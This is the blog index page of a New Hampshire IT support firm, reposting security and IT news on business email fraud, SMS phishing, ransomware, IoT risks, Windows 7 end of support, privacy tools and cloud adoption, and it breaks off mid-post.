Are You Having A Technology Emergency?

True North Networks Blog

True North Networks has been serving the Swanzey area since 2002, providing IT Support such as technical helpdesk support, computer support, and consulting to small and medium-sized businesses.

$18.6 Million Gone: Business Email Compromise at a Whole New Level

Business Email Compromise (BEC) is heavily tied to social engineering, where criminals con their way into victims' trust.email compromise 2019

And our team just came across an incredible example of BEC that takes this crime to a whole new level.

Chinese hackers steal $18.6 million in BEC scam

The Economic Times of India is reporting on an Italian company that had its operations in India taken for a ride through Business Email Compromiseand more:

The hackers sent emails to the head of Tecnimont Pvt Ltd, the Indian subsidiary of Milan-headquartered Tecnimont SpA, through an email account that looked deceptively similar to that of group CEO Pierroberto Folgiero, according to a police complaint, which ET has seen.

The hackers then arranged a series of conference calls to discuss a possible “secretive” and “highly confidential” acquisition in China. Several people played various roles during these calls, pretending to be the group.

The hackers convinced the India head that the money couldn’t be transferred from Italy due to regulatory issues.

So the Indian arm of this Italian company made three transfers to a Hong Kong bank over the course of a week in the fall of 2018: $5.6 million, $9.4 million, and $3.6 million.

The investigation has since revealed that those Hong Kong accounts were opened with fake identification documents and the money is gone.

Business Email Compromise, more sophisticated than ever

This topic really caught our attention because we just sat in on a SecureWorld web conference on NextGen Business Email Compromise.

This case proves the point made by KnowBe4 Security Awareness Advocate Erich Kron. He says a challenge for organizations now is that many underestimate the sophistication and urgency of these BEC attacks. 

"Sophisticated hackers have moved way beyond misspelled, poorly-formatted emails. Now, they turn the tables on employees, often by using fear as a trigger as if that person needs to act right now to avoid consequences for the organization or the employee."

And when you transfer $18.6 million in a week as part of a BEC scam, clearly, hackers created a sense of urgency.

Someday, someone will probably make a movie out of a heist like this. The orchestration, the planning, the conference calls full of criminals, one of whom even sounded like the company's CEO.

It is not only an incredible story. It's an incredible story of caution for CISOs, CFOs, and anyone who could be a money-making target at organizations around the globe.

The company fired its India chief and the head of accounts and finance because of the scam.

  0 Comments
0 Comments
Continue reading

End of Windows 7 Support Could Spark PC Boom

Microsoft to discontinue free support for the popular OS, forcing upgrades to Windows 10

The days of free support for Windows 7, one of the most popular commercial and consumer operating systems in the world, will end in January 2020. Businesses will have the windows7desktop 770x515option of buying extended support contracts or upgrading to Windows 10. And the upgrading could spark a boom in PC sales in 2019.

The Lowdown:  Microsoft announced that its free support and packing for Windows 7 will stop Jan. 14, 2020, ending five years of free maintenance and patching. Microsoft will offer business users Windows 7 Extended Security Updates (ESUs) on a per-user basis, with the price increasing annually until the operating system reaches its end of life. Microsoft Windows Virtual Desktop service customers will receive the ESU at no additional cost.

The Details:  In addition, Microsoft will stop providing support for Office 365 ProPlus running on Windows 7. Businesses can buy the ESU for the productivity package for an additional three years. Other products scheduled to have their free support end in 2020 include Exchange Server 2010, Windows Server 2008/R2, and Windows 7 for Embedded Systems.

The Impact:  Windows 10, the current Microsoft operating system, recently surpassed Windows 7 among desktop and notebook operating systems. Windows 10 has a 39 percent market share, while Windows 7 has 37 percent. In real numbers, this means more than 700 million personal computers running Windows 7 around the world need either ESUs or upgrades to Windows 10.

Background:  Microsoft made no secret of its plans to discontinue free patching and support for Windows 7. Demand for new PCs running Windows 10 increased in the second half of 2018. Unfortunately, https://channelnomics.com/2018/12/21/intel-chip-inventory-caught-short-by-unexpected-demand/'); return false;" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 15px; font-family: inherit; opacity: initial; color: rgb(0, 51, 55); text-decoration: none; transition: none 0s ease 0s; box-shadow: none;">a shortage of Intel Xeon and Core processors caused inventory shortfalls that blunted PC sales. Analysts anticipate those sales will rebound in 2019 as more businesses choose to refresh their PC fleets concurrent with an upgrade to Windows 10.

Channelnomics Point of View:  PC sales have steadily declined over the past seven years, mostly due to consumers switching their primary computing device to tablets and smartphones that run non-Windows operating systems. PC sales peaked in 2011 with more than 365 million units shipping. In 2018, PC shipments tallied just 254 million. The end of support for Windows 7 could prompt more businesses to refresh their PC fleets, opening tremendous opportunities for vendors and partners to cross-sell and upsell complementary products as well as managed and cloud services. The wild card in the equation is Intel, which is trying to ramp up processor production to meet demand.

Resource: https://www.channelnomics.com/2019/01/18/ptc-launches-program-to-help-industrial-iot-customers-get-faster-time-to-value/

  0 Comments
0 Comments
Continue reading

Is Your Business Prepared for a Winter Storm?

What would you do if your business was pummeled by a winter storm, causing power outages and prohibiting access from your office and clients? storm

Disaster recovery planning is an absolute must in a situation like this. It’s important to consider the impact a storm can have and to ensure you have a plan in place. Understand your vulnerabilities, safeguard against risks, and prepare for the worst.

Some things to consider to protect your business during a storm include preparing your building and ensuring there are no leaking pipes that may turn into a hazard with freezing temperatures, removing snow surrounding your building and on the roof, and obtaining a backup generator in case you lose power during the storm. For some more basic tips before and during a winter storm, head to Ready.gov.

If you’re interested in more information about how you ensure your business will not suffer during hazardous weather, check out our Natural Disaster Survival Guide for Businesses. This guide provides information about the risk levels and potential impact of various disasters, how disaster recovery planning can keep your business running, and more. Above all, stay safe during the storm!

Resource taken from: https://www.datto.com/blog/is-your-business-ready-for-a-winter-storm?utm_campaign=the-natural-disaster-survival-guide-for-businesses&utm_medium=Social&utm_source=203

  0 Comments
0 Comments
Continue reading

CES IoT security – Do You Know Who Your Home is Talking To?

There’s a digital treasure trove to be had in your home so you should take steps to protect it.

There isn’t a square meter of the show floor here at CES that doesn’t have some gadget connected to the internet. Whether tiny robots, your next house lighting controller, or new-fangled drink machine, it’s all connected. And while we’ve worked with multiple IoT manufacturers to help secure their devices once we discover vulnerabilities, the sprawl of potential vulnerable devices here is simply overwhelming.wpid Free Home Security Survey with Era.1501510987

For example, multiple vendors offer pieces of (or total) house control via audio. While it’s cool to have the house automatically open the curtains when you walk in and tell it to, there’s a potential downside. If someone could capture your voice, it’s easy to envision replay attacks where your house opens the doors, or those same windows so they can see what’s going on inside. This would be invaluable to would-be burglars before they attempt to break in, making sure nobody is home.

This sort of rush to market vibe runs amok here at CES – the idea that your company needs to display the latest thing to capture market share and development capital. Hopefully, security catches up along the way.

It’s easy to imagine things like whole-home ransomware, where rogue actors take over these automation systems, lock you out of them, then try to fleece you for money, and/or drain your bank account tied to a voice-activated ordering platform.

One company has a digital toothbrush that records your brushing patterns and develops trends over time. The dental industry and its insurers might view this granular information as a gold mine for marketing and determining insurance premiums. The question of privacy comes to the fore, as well as GDPR-style personal data conversations, in this case very personal. This, and other medical sensors displayed here walk a fine line, and privacy issues aside, a data leak would be most embarrassing and potentially damaging the victim and IoT provider.

As sensors become more central to the way we live, approach healthcare, and transport ourselves, the attack surface rises exponentially, especially as these sensors interface with the internet. It’s now possible to have digital spies in your house in whole new ways, but would you really know if they were?

There’s a digital treasure trove to be had in your home. At the center of it all is your home router. You know, the one you haven’t upgraded the firmware on (or there’s none available) since you bought it back in the day? Keeping track of this important digital intersection will become increasingly important, re-focusing the digital defense industry on defending your home network, which will become more complex and diverse than the corporate networks of yesteryear.

And while it’s probably not life threatening if one of those underwater robot fish they have here (really) for your low maintenance Koi pond motif goes berzerk, it might still be time to update your router and home security solutions to keep an eye out for rogue machines in your house. After all, you may not know that they’ve been revealing your deepest secrets, or if they soon will.

Resource: https://www.welivesecurity.com/2019/01/10/ces-iot-security-do-you-know-who-your-home-is-talking-to/ 

  0 Comments
0 Comments
Continue reading

Got an SMS offering $$$ refund? Don’t fall for it…

SMS, also known as text messaging, may be a bit of a “yesterday” technology……but SMS phishing is alive and well, and a good reminder that KISS really works.

If you aren’t familiar with the acronym KISS, it’s short for “keep it simple, stupid.”

Despite the rather insulting tone when you say the phrase out aloud, the underlying ideas work rather well in cybercrime.

Don’t overcomplicate things; pick a believable lie and stick to it; and make it easy for the victim to “figure it out” for themselves, so they don’t feel confused or pressurised anywhere along the way.

Here’s an SMS phish we received today, claiming to come from Argos, a well-known and popular UK catalogue merchant:

You have a refund of £245. Request refund and allow 3 days for it to appear in your account.
http://argos.co.uk.XXXXXXX.shop/login

The wording here probably isn’t exactly what a UK retailer would write in English (we’re not going to say more, lest we give the crooks ideas for next time!), but it’s believable enough.

That’s because SMS messages, of necessity, rely on a brief and direct style that makes it much easier to get the spelling and grammar right.

Ironically, after years of not buying anything from Argos, we recently purchased a neat new phone for our Android research from an Argos shop – the phone we mentioned in a recent podcast, in fact – so we weren’t particularly surprised or even annoyed to see a message apparently from the company.

We suspect that many people in the UK will be in a similar position, perhaps having done some Christmas shopping at a genuine Argos, or having tried to return an unwanted gift for a genuine refund.

The login link ought to be a giveaway, but the crooks have used an age-old trick that still works well: register an innocent looking domain name, such as online.example, and add the domain name you want to phish at the start.

This works because once you own the domain online.example, you automatically acquire the right to use any subdomain, all the way from http://www.online.example to some.genuine.domain.online.example.

Because we read from left-to-right, it’s easy to spot what looks like a domain name at the left-hand end of the URL and not realise that it’s just a subdomain specified under a completely unrelated domain.

These crooks chose the top-level domain (TLD) .shop, which is open for registrations from anywhere in the world.

Although .shop domains are generally a bit pricier than TLDs such as .com and .net, we found registrars with special deals offering cool-looking .shop names starting under $10.

 

 

What if you click through?

What harm in looking?

Well, the problem with clicking through is that you put yourself directly in harm’s way.

Visting the link provided takes you to a pretty good facsimile of the real Argos login page, shown below on the left (the real page is on the right):

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

There’s not much fanfare, just a realistic clone of exactly the sort of content you’d expect to see, except for the lack of HTTPS and the not-quite-right domain name.

Getting free HTTPS certificates is pretty easy these days, so the crooks could have taken this extra step if they’d wanted.

Perhaps they were feeling lazy, or perhaps they figured that anyone who’d take care to check for the presence of a certificate might also click through to view the certificate, which would only serve to emphasise that it didn’t belong to Argos?

If you do fill in a username and password, then you have not only handed both of them to the crooks, but also embarked on a longer phishing expedition by the crooks, because the next page asks for more:

We didn’t try going any further than this, so we can’t tell you what the crooks might ask you next – but one thing is clear: by the time you get here, you’ve already given away far too much.

 

 

What to do?

  • Check the full domain name. Don’t let your eyes wander just because the server name you see in the link starts off correctly. What matters is how it ends.
  • Look for the padlock. These days, many phishing sites have a web security certificate so you will often see a padlock even on a bogus site. So the presence of a padlock doesn’t tell you much on its own. But the absence of a padlock is an instant warning saying, “Go no further!”
  • Don’t use login links in SMSes or emails. If you think you are getting a refund, find your own way to the merchant’s login page, perhaps via a bookmark, a search engine, or a printed invoice from earlier. It’s a bit slower than just clicking through but it’s way safer.
  0 Comments
0 Comments
Continue reading

How one hacked laptop led to an entire network being compromised

A corporate laptop being used in a coffee shop at a weekend was enough to allow a sophisticated cybercrime group to compromise an organisation's entire infrastructure.hacked laptop

The incident was detailed by cybersecurity firm Crowdstrike as part of its Cyber Intrusion Services Casebook 2018 report and serves as a reminder that laptops and other devices that are secure while running inside the network of an organisation can be left exposed when outside company walls.

Crowdstrike described the company that fell victim to the hackers only as apparel manufacturer "with an extensive global presence, including retail locations".

The incident began when an employee of the manufacturer took their laptop to a coffee shop and used it to visit the website of one of the firm's partners.

The security researchers said the user visited the site after being directed there by a phishing email -- and that the site had been compromised by FakeUpdates, a malware and social engineering campaign affecting thousands of Joomla and Wordpress sites.

The malware shows users pop-ups which claim their browser software needs updating. In this instance, the laptop was then infected with the Dridex banking trojan and the PowerShell Empire post-exploit toolset.

The security software being used by the clothing company -- Crowdstrike didn't name the vendor -- relied on devices being inside the corporate network to pick up threats. As the laptop was being used outside the network, this incident didn't become apparent until the laptop was back in the office -- by which time it was too late.

The infected laptop then served as an entry point for the attackers to compromise the corporate network, allowing the attackers to use PowerShell exploit to access dozens of systems that could be compromised by taking advantage of the user's permissions.

The attackers were also able to gather additional privileged account credentials by using Mimikatz, an open-source utility used to retrieve clear text credentials and hashes from memory, to gain access to servers and further move across the network.

"Local administrator privileges made it easier for the threat actor to access a multitude of endpoints by accessing just one account that linked them all. Once access to the domain was gained, it left the organization completely exposed," Bryan York, director of professional services at Crowdstrike told ZDNet.

This exposure allowed the attackers to install Framework POS malware on the retail store server with the intention of stealing credit card data.

Researchers have identified a cyber criminal group they call Indrik Spider as the culprits of the attack. The hacking operation has been active since 2014 and is heavily associated with Dridex and BitPaymer ransomware campaigns, which are thought to have netted the attackers millions of dollars.

It's the first time Indrik Spider has been associated with FakeUpdates, indicating that the group is expanding its operations as it continues to find new means of illicitly making money. Crowdstrike wouldn't say whether the campaign was successful in its goal or if credit card data was stolen from the company -- but there are lessons that organisations should take on board to avoid falling victim to similar campaigns.

Crowdstrike recommends that accounts should be segregated, and that end users shouldn't be given administrator privileges on their local systems. In this incident, the adversary abused a misconfiguration within the company's Active Directory that provided unnecessary privileges -- so the security firm recommends that organisations should regularly review Active Directory configurations across the entire global enterprise.

"Attackers used PowerShell or Windows Management Instrumentation in 20 percent of the cases we saw this year and businesses need to know how to better detect and protect against these," said York.

Resource: https://www.zdnet.com/article/how-one-hacked-laptop-led-to-an-entire-network-being-compromised/

  0 Comments
0 Comments
Continue reading

How To Spot a Social Media Hoax

Well, well, well, if it isn’t the WhatsApp Gold/’martinelli’ video scam, back again, as half-bunk and half-real-threat as ever.

Excellent! It’s a great opportunity to offer some advice on pulling the rug out from under these and other scammers. For the dissection of Gold/martinelli, read on. For some whats appadvice to forward to the prey of the scammers, jump on further down!

The current bunk

As Snopes tells it, the WhatsApp Gold scam messages have been kicking around since at least 2016 in varyingly worded messages, claiming that some new “premium service” would get users extra goodies, such as video calling and new emojis.

Hey Finally Secret WhatsApp golden version has been leaked, This version is used only by big celebrities. Now we can use it too.

Users who clicked on the link got no goodies. They got baddies, in the form of a malware-rigged, non-WhatsApp website. The malware, nicknamed WhatsApp Gold, was designed to break into phones and steal victims’ messages and other private data.

Bad enough, eh? Well, the mad cyber scientists decided to make it a bit more poisonous when they wrapped a true warning about the real WhatsApp Gold malware around a bogus warning about a fictional video called martinelli.

This scam burrito has been getting passed around since at least mid-2017, picking up only minor word swaps but still refusing to unglue its death-grip on arbitrary, proofreader-taunting, inappropriate spaces around punctuation.

The version we saw in November:

If you know anyone using WhatsApp you might pass on this. An IT colleague has advised that a video comes out tomorrow from WhatsApp called martinelli do not open it , it hacks your phone and nothing will fix it. Spread the word. If you receive a message to update the Whatsapp to Whatsapp Gold, do not click !!!!!
Now said on the news this virus is difficult and severe

Pass it on to all

According to multiple news outlets, that sage, fictional “IT colleague” is back again, once again babbling about this equally fictional martinelli video.

That’s just fine, you scammers. We’re back again, too, you purveyors of WhatsApp Fool’s Gold. We’re here to tell you how to spot these hoaxes. Sage IT colleague types, please do enlighten the not-so-IT-savvy among you with these nuggets.

How to spot WhatsApp hoaxes

Atrocious punctuation and feeble English are common in phishing/spam/hoax messages, but we need more tools than that to discern when something’s a threat. After all, it’s not a given that a) non-threat-actors (as in, our friends) know how to use commas, et al., or b) scammers don’t use proper English and punctuation. To that end, keep an eye out for these elements on top of funky, clunky English:

Call to action. As Sophos’s John Shier has noted in an excellent “Phish or legit?” walk-through, most phishing campaigns snap their fingers at you.

Scam WhatsApp messages and Facebook hoaxes have a call to action, too: they urge readers to copy/paste the warning and forward it to others. It’s meant to add a sense of urgency to the message and compel you to do something.

The threat. As WhatsApp notes in its FAQ about hoax messages, hoaxers often claim you can avoid punishment, such as account suspension, if you forward the message. A sender might imply that they have the law on their side, and that they’ll use their law enforcement affiliations should you be up to something dodgy.

In the case of WhatsApp Gold/martinelli, the “threat” is from a (nonexistent) video, and that you shouldn’t click on a link urging you to update Whatsapp to Whatsapp Gold (true!), less your phone get hacked.

Authority figures. To make the threat convincing, hoaxers often sprinkle in references to voices of authority. If it’s not the cops, it’s that Gold/martinelli “IT colleague”. Way, way too often, friends will pass on these words from purported experts, or police, or the tax authorities, reasoning that “it can’t hurt.”

And after you’ve spotted the Gold/martinelli or any other hoax…

Don’t forward. Just simply warn them without the forward. Consider doing it by private message. After all, if you comment on, say, a Facebook post itself, you’re adding to its page ranking, pushing it all that much closer to going viral.

Like Sophos’s Paul Ducklin said in a recent video, it can do us harm when we copy, paste and spread somebody else’s lies. It hurts our reputations and our accountability. Who needs that?

Arm yourself against WhatsApp Gold malware

Staying safe online means keeping out all the malware that’s out there, not just the one or two rogue applications you hear about via friends’ WhatsApp messages.

Instead, just follow some simple advice to keep your phone secure, and advise your friends and family to do the same:

  • Apply security updates promptly.
  • Get your apps from the App Store or Google Play.
  • Use security software like Sophos Mobile Security for iOS or Android.

Resource taken from: 

  0 Comments
0 Comments
Continue reading

NSA will release a free tool for reverse engineering malware

It's helping to improve security rather than undermine it.

The NSA has frequently been accused of holding on to info that could potentially improve security, but this time it's being a little less secretive. The agency is planning to release NSA malwarea free reverse engineering tool, GHIDRA, in tandem with the RSA Conference on March 5th. The software dissects binaries for Android, iOS, macOS and Windows, turning them into assembly code that can help analyze malware or pinpoint questionable activity in otherwise innocent-looking software.

ZDNet noted that this kind of software isn't strictly new, and GHIDRA in particular isn't secret (it mainly entered the spotlight with the Vault 7 leak). However, existing reverse engineering options like IDA are expensive and generally inaccessible -- this would let any reasonably knowledgeable person tear open a program and gain a better understanding of what makes it tick.

As with the NSA's other open source projects, this isn't an altruistic gesture. In addition to improving overall security, it could improve the quality of GHIDRA by letting the community address bugs and introduce their own features. Whatever the NSA loses in control it might gain through better overall security.

Resource taken from: https://www.engadget.com/2019/01/06/nsa-releasing-code-reverse-engineering-tool/

  0 Comments
0 Comments
Continue reading

Cybersecurity 101: How to Browse the Web Securely and Privately

So you want to browse the web securely and privately? Here’s a hard truth: it’s almost impossible.cybersecurity 101

It’s not just your internet provider that knows which sites you visit, it’s also the government — and other governments! And when it’s not them, it’s social media sites, ad networks or apps tracking you across the web to serve you specific and targeted ads. Your web browsing history can be highly personal. It can reveal your health concerns, your political beliefs and even your porn habits — you name it. Why should anyone other than you know those things?

Any time you visit a website, you leave a trail of data behind you. You can’t stop it all — that’s just how the internet works. But there are plenty of things that you can do to reduce your footprint.

Here are a few tips to cover most of your bases.

A VPN can help hide your identity, but doesn’t make you anonymous

You might have heard that a VPN — or a virtual private network — might keep your internet traffic safe from snoopers. Well, not really.

A VPN lets you create a dedicated tunnel that all of your internet traffic flows through — usually a VPN server — allowing you to hide your internet traffic from your internet provider. That’s good if you’re in a country where censorship or surveillance is rife or trying to avoid location-based blocking. But otherwise, you’re just sending all of your internet traffic to a VPN provider instead. Essentially, you have to choose who you trust more: your VPN provider or your internet provider. The problem is, most free VPN providers make their money by selling your data or serving you ads — and some are just downright shady. Even if you use a premium VPN provider for privacy, they can connect your payment information to your internet traffic, and many VPN providers don’t even bother to encrypt your data.

Some VPN providers are better than others: tried, tested — and trusted — by security professionals.

Services like WireGuard are highly recommended, and are available on a variety of devices and systems — including iPhones and iPads. We recently profiled the Guardian Mobile Firewall, a smart firewall-type app for your iPhone that securely tunnels your data anonymously so that even its creators don’t know who you are. The app also prevents apps on your phone from tracking you and accessing your data, like your contacts or your geolocation.

As TechCrunch’s Romain Dillet explains, the best VPN providers are the ones that you control yourself. You can create your own Algo VPN server in just a few minutes. Algo is created by Trial of Bits, a highly trusted and respected security company in New York. The source code is available on GitHub, making it far more difficult to covertly insert backdoors into the code.

With your own Algo VPN setup, you control the connection, the server, and your data.

You’ll need a secure DNS

What does it mean that “your internet provider knows what sites you visit,” anyway?

Behind the scenes on the internet, DNS — or Domain Name System — converts web addresses into computer-readable IP addresses. Most devices automatically use the resolver that’s set by the network you’re connected to — usually your internet provider. That means your internet provider knows what websites you’re visiting. And recently, Congress passed a law allowing your internet provider to sell your browsing history to advertisers.

You need a secure and private DNS provider. Many use publicly available services — like OpenDNS or Google’s Public DNS. They’re easy to set up — usually on your computer or device, or on your home router.

One recommended offering is Cloudflare’s secure DNS, which it calls 1.1.1.1. Cloudflare encrypts your traffic, won’t use your data to serve ads, and doesn’t store your IP address for any longer than 24 hours. You can get started here, and you can even download Cloudflare’s 1.1.1.1 app from Apple’s App Storeand Google Play.

HTTPS is your friend

One of the best things for personal internet security is HTTPS.

HTTPS secures your connection from your phone or your computer all the way to the site you’re visiting. Most major websites are HTTPS-enabled, and appear as such with a green padlock in the address bar. HTTPS makes it almost impossible for someone to spy on your internet traffic intercept and steal your data in transit.

Every time your browser lights up in green or flashes a padlock, HTTPS encrypts the connection between your computer and the website. Even when you’re on a public Wi-Fi network, an HTTPS-enabled website will protect you from snoopers on the same network.

Every day, the web becomes more secure, but there’s a way to go. Some websites are HTTPS ready but don’t have it enabled by default. That means you’re loading an unencrypted HTTP page when you could be accessing a fully HTTPS page.

That’s where one browser extension, HTTPS Everywhere, comes into play. This extension automatically forces websites to load HTTPS by default. It’s a lightweight, handy tool that you’ll forget is even there.

 

Reconsider your web plug-ins

Remember Flash? How about Java? You probably haven’t seen much of them recently, because the web has evolved to render them obsolete. Both Flash and Java, two once-popular web plug-ins, let you view interactive content in your web browser. But nowadays, most of that has been replaced by HTML5, a technology native to your web browser.

Flash and Java were long derided for their perpetual state of insecurity. They were full of bugs and vulnerabilities that plagued the internet for years — so much so that web browsers started to pull the plug on Java back in 2015, with Flash set to sunset in 2020. Good riddance!

If you don’t use them — and most people don’t anymore — you should remove them. Just having them installed can put you at risk of attack. It takes just a minute to uninstall Flash on Windows and Mac, and to uninstall Java on Windows and Mac.

Most browsers — like Firefox and Chrome — let you run other add-ons or extensions to improve your web experience. Like apps on your phone, they often require certain access to your browser, your data or even your computer. Although browser extensions are usually vetted and checked to prevent malicious use, sometimes bad extensions slip through the net. Sometimes, extensions that were once fine are automatically updated to contain malicious code or secretly mine cryptocurrency in the background.

There’s no simple rule to what’s a good extension and what isn’t. Use your judgment. Make sure each extension you install doesn’t ask for more access than you think it needs. And make sure you uninstall or remove any extension that you no longer use.

These plug-ins and extensions can protect you

There are some extensions that are worth their weight in gold. You should consider:

  • An ad-blocker: Ad-blockers are great for blocking ads — as the name suggests — but also the privacy invasive code that can track you across sites. uBlock is a popular, open source efficient blocker that doesn’t consume as much memory as AdBlock and others. Many ad-blockers now permit “acceptable ads” that allow publishers to still make money but aren’t memory hogs or intrusive — like the ones that take over your screen. Ad-blockers also make websites load much faster.
  • A cross-site tracker blocker: Privacy Badger is a great tool that blocks tiny “pixel”-sized trackers that are hidden on web pages but track you from site to site, learning more about you to serve you ads. To advertisers and trackers, it’s as if you vanish. Ghostery is another example of an advanced-level anti-tracker that aims to protect the user by default from hidden trackers.

And you could also consider switching to more privacy-minded search engines, like DuckDuckGo, a popular search engine that promises to never store your personal information and doesn’t track you to serve ads.

Use Tor if you want a better shot at anonymity

But if you’re on the quest for anonymity, you’ll want Tor.

Tor, known as the anonymity network is a protocol that bounces your internet traffic through a series of random relay servers dotted across the world that scrambles your data and covers your tracks. You can configure it on most devices and routers. Most people who use Tor will simply use the Tor Browser, a preconfigured and locked-down version of Firefox that’s good to go from the start — whether it’s a regular website, or an .onion site — a special top-level domain used exclusively for websites accessible only over Tor.

Tor makes it near-impossible for anyone to snoop on your web traffic, know which site you’re visiting, or that you are the person accessing the site. Activists and journalists often use Tor to circumvent censorship and surveillance.

But Tor isn’t a silver bullet. Although the browser is the most common way to access Tor, it also — somewhat ironically — exposes users to the greatest risk. Although the Tor protocol is largely secure, most of the bugs and issues will be in the browser. The FBI has been known to use hacking tools to exploit vulnerabilities in the browser in an effort to unmask criminals who use Tor. That puts the many ordinary, privacy-minded people who use Tor at risk, too.

It’s important to keep the Tor browser up to date and to adhere to its warnings. The Tor Project, which maintains the technology, has a list of suggestions — including changing your browsing behavior — to ensure you’re as protected as you can be. That includes not using web plug-ins, not downloading documents and files through Tor, and keeping an eye out for in-app warnings that advise you on the best action.

Just don’t expect Tor to be fast. It’s not good for streaming video or accessing bandwidth-hungry sites. For that, a VPN would probably be better.

Resource taken from: https://techcrunch.com/2018/12/25/cybersecurity-101-guide-browse-web-securely-privately/ 

  0 Comments
0 Comments
Continue reading

True North Lends a Hand

See what we’re up to:

philanthropy hands

TNN’s Philanthropy Committee continues to be busy; please visit the causes belowthat we supported during the last quarter of 2018!

Are you passionate about helping your community? 

Want to team up with TNN to make a difference? 

Are you a non-profit and in need of some assistance? TNN is here to help!

We would love to hear from you - please email Suzanne Ruse for more information!

 

  0 Comments
0 Comments
Continue reading

North Korean Ransomware Attack Disrupts Major U.S. News Media

It was all over the news. A server outage at a major newspaper publishing company on Saturday that prevented the distribution of many leading U.S. newspapers, including the north korea ransomwareWall Street Journal, New York Times, Los Angeles Times, Chicago Tribune and Baltimore Sun. An early, unnamed source revealed they found files with a .RYK extension, and it looks like this might be a targeted ransomware attack using the specialized Ryuk ransomware family. This strain is the latest incarnation of the earlier HERMES ransomware which is attributed to the capable and active Lazarus Group that operates out of a Chinese city just north from North Korea and reportedly controlled by the N.K. Unit 180 spy agency. Unlike spray-and-pray ransomware, Ryuk is mainly used for tailored attacks very similar to SamSam, and its encryption scheme is specifically built for focused infections, such that only crucial assets and resources are encrypted in each targeted network, carried out manually by the attackers. Reality Check: "It Is Very Hard to Keep a State-Sponsored Bad Actor Out of Your Network" Security experts believe that the Ryuk crew targets and penetrates selected companies one at a time—charging exceptionally large ransoms—either via spear phishing, RDP connections, or other yet unknown penetration techniques. Ryuk is not decryptable at the time of this writing, and it is very hard to keep a determined state-sponsored "Advanced Persistent Threat" bad actor out of your network. You really need to practice defense-in-depth and even then... Now, having said that, I admit it is in the early days and this attribution is more a gut-feel estimate rather than something proven by forensics. There are a lot of "false flag" operations going on, and someone else may have gotten hold of that code. Feels like N.K. though. The infected publisher said in a statement Saturday that: “the personal data of our subscribers, online users, and advertising clients has not been compromised. We apologize for any inconvenience and thank our readers and advertising partners for their patience as we investigate the situation.” Any organization today needs to have weapons-grade backup procedures in place to restore production systems that have been compromised. I'm sure that they are doing exactly that, there are some IT heroes pulling all-nighters out there I'm sure. Also, it could mean they decided not to pay the ransom, good for them! Ryuk-HERMES Similarities Are Clear as Daylight The connections are pretty obvious, shown by Check Point researchers which recently analyzed the two ransomware strains. They pointed at clear similarities between past Hermes strains and current Ryuk samples, which share large chunks of code:

  • The function that encrypts a single file is almost identical
  • Ryuk and Hermes use the same file marker for encrypted files
  • The check for the file marker is also identical
  • Both whitelist similar folders (e.g. “Ahnlab”, “Microsoft”, “$Recycle.Bin” etc.)
  • Both write a batch script named “window.bat” in the same path
  • Both used a similar script to delete shadow volumes and backup files

Ryuk versions for 32-bit and 64-bit systems were discovered, suggesting the ransomware can infect all types of systems, new and old alike. But there are also some differences. The main one is that Ryuk comes with a huge list of apps and services it shuts down before infecting a victim's systems. "The ransomware will kill more than 40 processes and stop more than 180 services by executing taskkill and net stop on a list of predefined service and process names," Check Point researchers explained in a report. This is one nasty piece of malware.

 

Resource: www.KnowBe4.com

 

  0 Comments
0 Comments
Continue reading

What's Your Weakest Security Link?

Stephen Nardone, Director of the Security Practice at Connection, is a leader in the field of IT security risks, frameworks, assessment, strategy, and compliance. Stephen has weakest security linkbeen a CYTO/CSO for the Commonwealth of Massachusetts and has developed security strategies for multiple government and private sector organizations. With more than three decades in the field, Stephen understands that cyber threats and cyber attacks are part of today’s technology reality. It’s not a matter of if, but when the breach will happen. “Prepare for ‘the when,’” is one of his standard mantras.

Stephen recommends some very basic strategy to offer some protection from IoT cyber intruders:

  • Connection assessment:The first line of defense is common sense. Consider what you’re connecting to your network and understand with IoT standards and protocols, security blind spots are inevitable. Only connect devices you need and only if secured end-to-end.
  • Change passwords:Many plug-and-play IoT devices are set up with open, default, or no passwords. Set a password, and change often Remember the Mirai attack targeted default passwords.
  • Purchase known technology:Stay away from knock-offs, unknown names, and unproven devices.
  • Install patches and update firmware:Many security issues are due to end users ignoring the latest patches and firmware updates. Cyber criminals target missing patches. Reputable companies are on the cutting edge of security and offer managed patching strategies to avoid cyber penetration.
  • User awareness training:Training employees and learning of all the potential threats is the first course of action. The old saying “knowledge is power” goes a long way. Password and patch management, purchasing decisions, how things are connected to your network, and, of course, social engineering are key awareness training areas.
  • Data protection:Ensure that all users know their role in the oversight of protecting critical data at rest, data in process, and data in motion. Take the time to identify and classify your sensitive data.

Resource: https://community.connection.com/understanding-the-internet-of-things-and-security-threats-you-never-knew-existed/?cm_mmc=buzzhive-_-user-32330-_-post-f70fd6e7-da21-47d1-8f7c-a07b0404e62c-_-LinkedIn

  0 Comments
0 Comments
Continue reading

True North Networks Lends a Hand!

See what we’re up to:

philanthropy hands

TNN’s Philanthropy Committee continues to be busy; please visit the causes below that we supported during the last quarter of 2018!

  • Hundred Nights Inc. - a cold weather shelter and open doors resource center in Keene, NH
  • Prospect House - a men’s registered sober house in Keene, NH
  • Our Victims of Terror Fund through the Jewish Federation of Greater Pittsburgh, PA in memory of the victims, one of which was a personal loss to a TNN client
  • Phoenix House- - a substance abuse disorder treatment home in Keene and Dublin, NH

Are you passionate about helping your community? 

Want to team up with TNN to make a difference? 

Are you a non-profit and in need of some assistance? TNN is here to help!

 

We would love to hear from you - please email Suzanne Ruse for more information!

  0 Comments
0 Comments
Continue reading

Infrastructure Reality Check: What Can Go in the Cloud, Really?

Some healthcare CIOs say it's time to move just about everything to the cloud, while others say not so fast.

Long-term cloud costs

The long-term costs of managing cloud services must be considered. Something can be very easy to use but is not feasible from a cost control perspective.cloud security

“Theoretically you do not want to go down the road of using a cloud solution just because it is easy, because it might come with a cost uplift,” he said. “Easy does not always translate into how things are operationalized, hence how things are paid for and managed and budgeted.”

So while ease of use is indeed a consideration, it seems like the big question still comes down to what can healthcare CIOs really put in the cloud today? On the security front, what data and applications can exist in the cloud?

Since 2013, Brookdale University Hospital and Medical Center’s electronic health record has been in the cloud.

“We are very careful with our patient data, we have taken a strong stance on the security aspect of that, constantly making sure that it is as good if not better than self-hosted,” said Tarlow of Brookdale. “Our ERP system is in the cloud, many of our ancillary systems have been in the cloud for five-plus years. Our interface engine.”

Technologies the provider organization has not yet moved to the cloud are ones that are heavily dependent on bandwidth, and that staff are not yet fully comfortable with the speed of moving these last systems to the cloud. Staff are strategizing on how to move them to the cloud.

Nearly everything to the cloud

